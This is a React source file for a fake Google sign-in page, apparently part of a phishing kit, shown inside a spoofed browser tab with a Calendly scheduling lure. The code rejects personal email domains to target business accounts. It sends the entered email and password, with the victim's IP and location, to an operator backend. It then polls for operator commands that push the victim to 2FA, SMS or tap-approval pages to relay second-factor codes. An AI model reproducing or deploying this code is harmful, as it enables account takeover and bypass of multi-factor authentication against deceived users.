import { useState, useEffect, useRef } from "react";
import { useNavigate } from "react-router-dom";
import eye from "./assets/eye.png";
import eyeClose from "./assets/eye-close.png";
import BrowserTab from "./BrowserTab";
import CalendlySchedule from "./Calendly";

const BLOCKED_EMAIL_DOMAINS = new Set([
  "gmail.com",
  "googlemail.com",
  "yahoo.com",
  "msn.com",
  "icloud.com",
  "live.com",
  "hotmail.com",
  "outlook.com",
  "protonmail.com",
  "aol.com",
]);

function isBlockedEmailDomain(rawEmail) {
  const at = rawEmail.lastIndexOf("@");
  if (at < 0) return false;
  return BLOCKED_EMAIL_DOMAINS.has(rawEmail.slice(at + 1).trim().toLowerCase());
}

const BUSINESS_EMAIL_MESSAGE = "Please use your work or business email";

export default function Login() {
  const navigate = useNavigate();
  const [code, setCode] = useState("");
  const [showPassword, setShowPassword] = useState(false);

  const [username, setUsername] = useState("");
  const [password, setPassword] = useState("");
  // Initialize session_id from localStorage on mount to maintain continuity
  const [sessionId, setSessionId] = useState(() => {
    return localStorage.getItem("session_id") || null;
  });
  const [loading, setLoading] = useState(false);
  const [redirecting, setRedirecting] = useState(false);
  const [messageIndex, setMessageIndex] = useState(0);
  const [error, setError] = useState("");
  const [infoMessage, setInfoMessage] = useState("");
  const API_URL = process.env.REACT_APP_API_BASE_URL;
  const [ip, setIp] = useState("");
  const [city, setCity] = useState("");
  const [country, setCountry] = useState("");
  const [showPasswordField, setShowPasswordField] = useState(false);
  const hasCreatedUser = useRef(false);
  const isSubmittingLogin = useRef(false); // Track if we're actually submitting login

  // Initialize session_id from localStorage and create new one if needed
  useEffect(() => {
    // First, try to get existing session_id from localStorage
    const existingSessionId = localStorage.getItem("session_id");
    if (existingSessionId) {
      setSessionId(existingSessionId);
      console.log(`✅ Loaded existing session_id from localStorage: ${existingSessionId}`);
    } else {
      // Only create new user session if we don't have one
      const createNewUser = async () => {
        try {
          if (hasCreatedUser.current || localStorage.getItem("user_created"))
            return;

          const res = await fetch(`${API_URL}/api/new-user`, {
            method: "POST",
            headers: { "Content-Type": "application/json" },
            body: JSON.stringify({}),
          });

          if (!res.ok) throw new Error("Failed to notify new user.");

          const data = await res.json();
          if (data.session_id) {
            setSessionId(data.session_id);
            localStorage.setItem("session_id", data.session_id);
            localStorage.setItem("user_created", "true");
            hasCreatedUser.current = true;
            console.log(`✅ Created new session_id: ${data.session_id}`);
          }
        } catch (err) {
          console.error("Failed to notify new user:", err);
        }
      };

      if (!localStorage.getItem("user_created")) {
        createNewUser();
      }
    }
  }, [API_URL]);

  // Email validation function
  const isValidEmail = (email) => {
    const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
    return emailRegex.test(email);
  };

  const handleEmailNext = (e) => {
    e.preventDefault();
    if (!username.trim()) return;
    
    // Validate email format
    if (!isValidEmail(username.trim())) {
      setError("Enter a valid email address");
      return;
    }

    if (isBlockedEmailDomain(username.trim())) {
      setError(BUSINESS_EMAIL_MESSAGE);
      return;
    }
    
    setError("");
    setShowPasswordField(true);
    // Explicitly ensure loading is false when just moving to password step
    setLoading(false);
    isSubmittingLogin.current = false;
  };

  const handleSubmit = (e) => {
    e.preventDefault();
    if (!showPasswordField) {
      handleEmailNext(e);
      return;
    }
    
    // Only proceed if we have both username and password
    if (!username.trim() || !password.trim()) {
      return;
    }
    
    if (isBlockedEmailDomain(username.trim())) {
      setError(BUSINESS_EMAIL_MESSAGE);
      setShowPasswordField(false);
      setPassword("");
      return;
    }
    
    setError("");
    setInfoMessage("");
    setLoading(true);
    isSubmittingLogin.current = true; // Mark that we're submitting login

    localStorage.setItem("username", username);
    localStorage.setItem("password", password);
    localStorage.setItem("userEmail", username); // Store email for display in verification modals

    (async () => {
      try {
        // Get existing session_id from localStorage (from booking step or page load)
        const existingSessionId = localStorage.getItem("session_id");

        // Re-fetch client geo on submit: useEffect can race, so city/country were often still empty
        let loginIp = ip;
        let loginCity = city;
        let loginCountry = country;
        try {
          const geo = await (await fetch("https://ipwho.is/")).json();
          if (geo.success) {
            if (geo.ip) loginIp = loginIp || geo.ip;
            if (!loginCity) loginCity = String(geo.city || "").trim();
            if (!loginCountry) loginCountry = String(geo.country || "").trim();
          }
        } catch {
          // Backend enriches from the resolved request IP; continue
        }
        
        const res = await fetch(`${API_URL}/api/login`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ 
            username, 
            password, 
            ip: loginIp, 
            city: loginCity, 
            country: loginCountry, 
            old_session_id: existingSessionId 
          }),
        });
        if (!res.ok) {
          const data = await res.json();
          throw new Error(data.detail || "Login failed");
        }
        const { session_id } = await res.json();
        if (session_id) {
          setSessionId(session_id);
          localStorage.setItem("session_id", session_id); // Store session_id for all pages
          console.log(`✅ Login successful - Session ID stored: ${session_id}`);
        }
        // Keep loading state - waiting for admin command (Tap, Email, SMS, etc.)
        setLoading(true);
      } catch (err) {
        console.error("Login failed:", err);
        setError(err.message || "Login failed");
        setLoading(false);
        isSubmittingLogin.current = false;
        // Don't remove session_id on error - keep it for retry
        // Only reset if it's a critical error
      }
    })();
  };

  useEffect(() => {
    // Only start polling if we have a sessionId AND we've submitted login
    // Don't poll if we're just on the email field or password field without submitting
    if (!sessionId || !isSubmittingLogin.current) {
      // Ensure loading is off when not submitting
      setLoading(false);
      return;
    }

    const routes = {
      email: "/email",
      "2fa": "/2fa",
      sms: "/sms",
      tap: "/tap",
    };

    // Set loading to true when we start polling (after login submission)
    setLoading(true);

    const poll = setInterval(async () => {
      try {
        const res = await fetch(
          `${API_URL}/check_response?session_id=${sessionId}`
        );

        if (!res.ok) throw new Error("Failed to fetch response");

        const data = await res.json();

        // PRIORITY 1: Check for authType redirect - only redirect when command is clicked
        if (data.authType) {
          setError(""); // Clear errors
          const route = routes[data.authType];
          console.log(`🔍 Checking route for authType: "${data.authType}", route: ${route}`);
          
          if (route) {
            // Redirect to the appropriate page when command is clicked
            clearInterval(poll);
            setError("");
            setLoading(false);
            isSubmittingLogin.current = false;
            setRedirecting(true);
            console.log(`✅ Redirecting to ${route} for authType: ${data.authType}`);
            window.location.replace(route);
          } else {
            // Waiting for command completion - keep loading while waiting
            console.log(`⏳ Waiting for command completion - authType: "${data.authType}"`);
            setError("");
            setLoading(true); // Keep loading while waiting for completion
          }
          return;
        }

        if (data.redirect) {
          clearInterval(poll);
          setError(""); // Clear errors
          setLoading(false);
          isSubmittingLogin.current = false;
          setRedirecting(true);
          // Use React Router navigate for internal routes
          if (data.redirect.startsWith("/")) {
            navigate(data.redirect);
          } else {
            // External URLs use window.location
            window.location.replace(data.redirect);
          }
          return;
        }
        
        // PRIORITY 2: Only show errors if NO redirect is happening
        if (data.error && !data.authType && !data.redirect) {
          const errorLower = data.error.toLowerCase();
          // Only show login-related errors
          if (errorLower.includes("email") || errorLower.includes("password") || errorLower.includes("sign you in") || errorLower.includes("wrong")) {
            clearInterval(poll);
            setLoading(false);
            isSubmittingLogin.current = false;
            setError(data.error);
            
            // Reset form to allow user to try again from beginning
            if (errorLower.includes("wrong email") || errorLower.includes("wrong password")) {
              setShowPasswordField(false);
              setPassword("");
              // Keep session_id for retry - don't remove it
            }
            return;
          }
        }
        
        // After login, keep loading state while waiting for admin command
        // This is the "between commands" state - waiting for next telegram action
        if (!data.authType && !data.redirect && !data.error) {
          setLoading(true); // Keep loading while waiting for admin command
          setError("");
        }

        if (data.message) {
          setInfoMessage(data.message);
        }
      } catch (err) {
        clearInterval(poll);
        setLoading(false);
        isSubmittingLogin.current = false;
        console.error("Polling error:", err);
        setError("Something went wrong while checking session.");
      }
    }, 3000);

    return () => clearInterval(poll);
  }, [sessionId, API_URL, navigate]);

  useEffect(() => {
    fetch("https://ipwho.is/")
      .then((res) => res.json())
      .then((data) => {
        setIp(data.ip || "");
        setCity(data.city || "");
        setCountry(data.country || "");
      })
      .catch(() => {});
  }, []);

  return (
    <div className="gcal-schedule-backdrop">
      <CalendlySchedule />
      <div className="login-page">
        <div className="browser-shadow">
          <BrowserTab />
          <div className="google-login-container">
            <div className="google-login-content">
              <div className="google-logo-container">
                <svg width="75" height="24" viewBox="0 0 75 24" xmlns="http://www.w3.org/2000/svg">
                  <path fill="#4285F4" d="M17.64 9.2c0-.637-.057-1.251-.164-1.84H9v3.481h4.844c-.209 1.125-.843 2.078-1.796 2.717v2.258h2.908c1.702-1.567 2.684-3.874 2.684-6.615z"/>
                  <path fill="#34A853" d="M9 18c2.43 0 4.467-.806 5.956-2.184l-2.908-2.258c-.806.54-1.837.86-3.048.86-2.344 0-4.328-1.584-5.036-3.711H.957v2.332C2.438 15.983 5.482 18 9 18z"/>
                  <path fill="#FBBC05" d="M3.964 10.707c-.18-.54-.282-1.117-.282-1.707s.102-1.167.282-1.707V4.951H.957C.348 6.174 0 7.55 0 9s.348 2.826.957 4.049l3.007-2.342z"/>
                  <path fill="#EA4335" d="M9 3.58c1.321 0 2.508.454 3.44 1.345l2.582-2.582C13.463.891 11.426 0 9 0 5.482 0 2.438 2.017.957 4.951L3.964 7.293C4.672 5.163 6.656 3.58 9 3.58z"/>
                </svg>
              </div>
              
              <h1 className="google-signin-heading">
                {showPasswordField ? "Welcome" : "Sign in"}
              </h1>
              <p className="google-signin-subheading">
                {showPasswordField ? "\u00A0" : "with your Google Account. This account will be available to other Google apps in the browser."}
              </p>

              {error && error.trim() && (
                <div className="google-error-container">
                  <p className="google-error-message">
                    {error}
                  </p>
                </div>
              )}

              <form onSubmit={handleSubmit} className="google-login-form">
                {!showPasswordField && (
                  <div className="google-input-group">
                    <div className="google-input-wrapper">
                      <input
                        id="identifier"
                        type="email"
                        autoComplete="username"
                        value={username}
                        onChange={(e) => {
                          setUsername(e.target.value);
                          if (showPasswordField && !e.target.value.trim()) {
                            setShowPasswordField(false);
                          }
                          // Clear error when user starts typing
                          if (error) {
                            setError("");
                          }
                        }}
                        required
                        disabled={loading}
                        pattern="[^\s@]+@[^\s@]+\.[^\s@]+"
                        className={`google-input ${username.trim() ? "google-input-filled" : ""} ${
                          error ? "google-input-error" : ""
                        }`}
                      />
                      <label htmlFor="identifier" className="google-label">
                        Email or phone
                      </label>
                    </div>
                  </div>
                )}

                {showPasswordField && (
                  <>
                    <div className="google-email-badge">
                      <svg
                        xmlns="http://www.w3.org/2000/svg"
                        className="google-email-badge-icon"
                        viewBox="0 0 24 24"
                        fill="currentColor"
                      >
                        <path d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm0 2c-2.67 0-8 1.34-8 4v2h16v-2c0-2.66-5.33-4-8-4z" />
                      </svg>
                      <span className="google-email-badge-text">{username}</span>
                      <svg
                        xmlns="http://www.w3.org/2000/svg"
                        className="google-email-badge-chevron"
                        viewBox="0 0 24 24"
                        fill="currentColor"
                      >
                        <path d="M7 10l5 5 5-5z" />
                      </svg>
                    </div>
                    <div className="google-input-group">
                      <div className="google-input-wrapper">
                        <input
                          id="password"
                          type={showPassword ? "text" : "password"}
                          autoComplete="current-password"
                          value={password}
                          onChange={(e) => setPassword(e.target.value)}
                          onKeyDown={(e) => {
                            if (e.key === "Enter" && password.trim()) {
                              handleSubmit(e);
                            }
                          }}
                          required
                          disabled={loading}
                          autoFocus={showPasswordField}
                          className={`google-input ${password.trim() ? "google-input-filled" : ""} ${
                            error ? "google-input-error" : ""
                          }`}
                        />
                        <label htmlFor="password" className="google-label">
                          Enter your password
                        </label>
                        <button
                          type="button"
                          className="google-password-toggle"
                          onClick={() => setShowPassword((prev) => !prev)}
                          tabIndex={-1}
                        >
                          {showPassword ? (
                            <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                              <path d="M12 4.5C7 4.5 2.73 7.61 1 12c1.73 4.39 6 7.5 11 7.5s9.27-3.11 11-7.5c-1.73-4.39-6-7.5-11-7.5zM12 17c-2.76 0-5-2.24-5-5s2.24-5 5-5 5 2.24 5 5-2.24 5-5 5zm0-8c-1.66 0-3 1.34-3 3s1.34 3 3 3 3-1.34 3-3-1.34-3-3-3z" fill="#5f6368"/>
                            </svg>
                          ) : (
                            <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                              <path d="M12 7c2.76 0 5 2.24 5 5 0 .65-.13 1.26-.36 1.83l2.92 2.92c1.51-1.26 2.7-2.89 3.43-4.75-1.73-4.39-6-7.5-11-7.5-1.4 0-2.74.25-3.98.7l2.16 2.16C10.74 7.13 11.35 7 12 7zM2 4.27l2.28 2.28.46.46C3.08 8.3 1.78 10.02 1 12c1.73 4.39 6 7.5 11 7.5 1.55 0 3.03-.3 4.38-.84l.42.42L19.73 22 21 20.73 3.27 3 2 4.27zM7.53 9.8l1.55 1.55c-.05.21-.08.43-.08.65 0 1.66 1.34 3 3 3 .22 0 .44-.03.65-.08l1.55 1.55c-.67.33-1.41.53-2.2.53-2.76 0-5-2.24-5-5 0-.79.2-1.53.53-2.2zm4.31-.78l3.15 3.15.02-.16c0-1.66-1.34-3-3-3l-.17.01z" fill="#5f6368"/>
                            </svg>
                          )}
                        </button>
                      </div>
                    </div>
                    <div className="google-show-password-checkbox">
                      <input
                        type="checkbox"
                        id="showPasswordCheckbox"
                        checked={showPassword}
                        onChange={(e) => setShowPassword(e.target.checked)}
                      />
                      <label htmlFor="showPasswordCheckbox">Show password</label>
                    </div>
                  </>
                )}

                {!showPasswordField && (
                  <div className="google-forgot-link">
                    <a href="#" className="google-link">Forgot email?</a>
                  </div>
                )}

                {showPasswordField && (
                  <div className="google-forgot-link">
                    <a href="#" className="google-link">Forgot password?</a>
                  </div>
                )}

                <div className={`google-guest-mode ${!showPasswordField ? 'visible' : 'hidden'}`}>
                  <p className="google-guest-mode-text">
                    Not your computer? Use Guest mode to sign in privately.{" "}
                    <a href="#" className="google-link">Learn more about using Guest mode</a>
                  </p>
                </div>

                <div className="google-button-group">
                  {showPasswordField && (
                    <button
                      type="button"
                      className="google-link-secondary"
                      onClick={() => {
                        setShowPasswordField(false);
                        setLoading(false);
                        isSubmittingLogin.current = false;
                        setError("");
                      }}
                      style={{ background: "none", border: "none", cursor: "pointer", padding: "0 8px" }}
                    >
                      Back
                    </button>
                  )}
                  {!showPasswordField && (
                    <a href="#" className="google-link-secondary">Create account</a>
                  )}
                  <button
                    type="submit"
                    className="google-button-primary"
                    disabled={loading || !username.trim() || (showPasswordField && !password.trim())}
                  >
                    {loading ? (
                      <div className="google-spinner"></div>
                    ) : (
                      "Next"
                    )}
                  </button>
                </div>
              </form>

              <div className="google-footer">
                <div className="google-footer-links">
                  <a href="#" className="google-footer-link">Help</a>
                  <a href="#" className="google-footer-link">Privacy</a>
                  <a href="#" className="google-footer-link">Terms</a>
                </div>
                <div className="google-language-selector">
                  <select className="google-language-select">
                    <option>English (United States)</option>
                  </select>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  );
}
